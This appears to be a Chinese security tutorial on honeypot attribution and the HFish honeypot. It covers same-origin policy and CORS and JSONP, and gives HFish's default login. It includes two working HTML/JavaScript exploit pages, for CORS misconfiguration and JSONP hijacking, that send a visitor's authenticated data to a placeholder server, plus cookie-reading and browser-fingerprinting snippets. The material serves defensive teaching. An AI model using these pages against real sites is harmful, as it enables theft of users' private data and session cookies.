蜜罐溯源以及蜜罐HFish的使用
字数 1447 2025-08-22 18:37:15
蜜罐溯源与HFish蜜罐使用详解
一、蜜罐技术基础
1.1 蜜罐定义与原理
蜜罐技术是一种对攻击方进行欺骗的技术,通过布置作为诱饵的主机、网络服务或信息,诱使攻击方实施攻击,从而捕获和分析攻击行为。
核心价值:
- 捕获攻击行为
- 分析攻击工具与方法
- 推测攻击意图和动机
- 增强实际系统安全防护能力
1.2 蜜罐溯源技术
蜜罐溯源是通过反向追踪技术对网络攻击源头进行定位和追踪,以发现攻击者的真实身份和意图。
类比:类似于警察通过监控摄像头追踪小偷的过程。
二、Web蜜罐个人信息收集技术
2.1 同源策略(Same-Origin Policy)
定义:由Netscape提出的安全策略,限制从同一源加载的文档或脚本如何与另一源的资源交互。
同源判断标准:
- protocol(http/https)
- port(如有指定)
- host
三者完全相同则为同源,否则为非同源。
例外情况:带src属性的标签(img, script等)不受同源策略限制。
2.2 CORS(跨域资源共享)
定义:Cross-Origin Resource Sharing,一种Web应用程序中进行跨域请求的安全机制。
工作原理:
- 服务器在HTTP响应头中添加特定标头
- 指示允许的跨域请求来源、HTTP方法和头信息
- 浏览器检查这些响应头决定是否允许跨域请求
关键响应头:
- Access-Control-Allow-Origin
- Access-Control-Allow-Methods
- Access-Control-Allow-Headers
2.3 CORS漏洞利用
当网站CORS配置错误时会产生漏洞,成为蜜罐的利用点。
CORS漏洞演示步骤:
- 搭建DoraBox靶场
- 配置网站仅允许本地访问
- 利用CORS漏洞制作简易蜜罐
- 模拟黑客踩蜜罐并捕获信息
示例蜜罐代码:
<!DOCTYPE html>
<html>
<head>
<title>CORS TEST</title>
</head>
<body>
<div id='output'></div>
<script type="text/javascript">
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get', '有CORS漏洞的网站', true);
req.withCredentials = true;
req.send();
function reqListener() {
new Image().src = "http://蜜罐服务器IP:10002/" +
window.btoa(unescape(encodeURIComponent(JSON.stringify(req.responseText))));
}
</script>
</body>
</html>
2.4 JSONP劫持
JSONP(JSON with Padding)是一种跨域获取资源的技术手段。
JSONP劫持原理:
- 利用script标签可跨域的特性
- 网站B对网站A的JSONP请求未安全检查
- 网站A利用漏洞获取用户在网站B上的数据
JSONP漏洞演示代码:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>JSONP EXP跨域测试</title>
</head>
<body>
<script>
function test(json){
new Image().src = "http://蜜罐服务器IP:10002/" + JSON.stringify(json);
}
</script>
<script src="有jsonp漏洞的网站url callback=test"></script>
</body>
</html>
三、JavaScript获取敏感信息方法
// 获取cookie
document.cookie
// 获取当前URL
window.location.href
// 获取当前路径
window.location.pathname
// 加载新页面
window.location.assign("http://xxxx")
// 浏览器信息收集
txt = "<p>浏览器代号: " + navigator.appCodeName + "</p>";
txt += "<p>浏览器名称: " + navigator.appName + "</p>";
txt += "<p>浏览器版本: " + navigator.appVersion + "</p>";
txt += "<p>启用Cookies: " + navigator.cookieEnabled + "</p>";
txt += "<p>硬件平台: " + navigator.platform + "</p>";
txt += "<p>用户代理: " + navigator.userAgent + "</p>";
txt += "<p>用户代理语言: " + navigator.language + "</p>";
// 弹窗
alert("hello");
// 确认弹窗
confirm("xxx");
// 输入框
prompt("请输入你的名字", "Harry Potter");
四、HFish蜜罐使用指南
4.1 HFish基本信息
HFish是一款社区型免费的中低交互蜜罐,侧重企业安全场景,具有以下功能:
- 内网失陷检测
- 外网威胁感知
- 威胁情报生产
4.2 安装与登录
- 安装完成后访问:https://127.0.0.1:4433/web/login
- 默认账号:admin
- 默认密码:HFish2021
- 支持中文界面切换
4.3 主要功能模块
A. 节点管理
- 查看已开启的蜜罐及对应端口
- 示例:8080端口部署的海康摄像头蜜罐
B. 攻击列表
- 记录所有攻击尝试
- 示例:对海康摄像头蜜罐的SQL注入攻击
- 点击"+"查看攻击详细信息
C. 攻击来源
- 分析攻击来源信息
D. 服务管理
- 查看蜜罐列表及功能说明
- 支持上传自定义蜜罐
E. 漏洞模拟
- 模拟各种漏洞环境
F. 高交互蜜罐
- 高级蜜罐功能
4.4 安全建议
渗透测试时采取以下措施减少蜜罐危害:
- 使用无痕模式
- 在虚拟机中进行测试
- 避免使用已登录敏感账户的浏览器
五、总结
蜜罐技术是网络安全防御的重要组成部分,通过:
- 理解同源策略和跨域机制
- 掌握CORS和JSONP漏洞利用方法
- 熟练使用HFish等蜜罐工具
- 采取适当防护措施
可以有效提升组织的安全防护能力和威胁感知能力。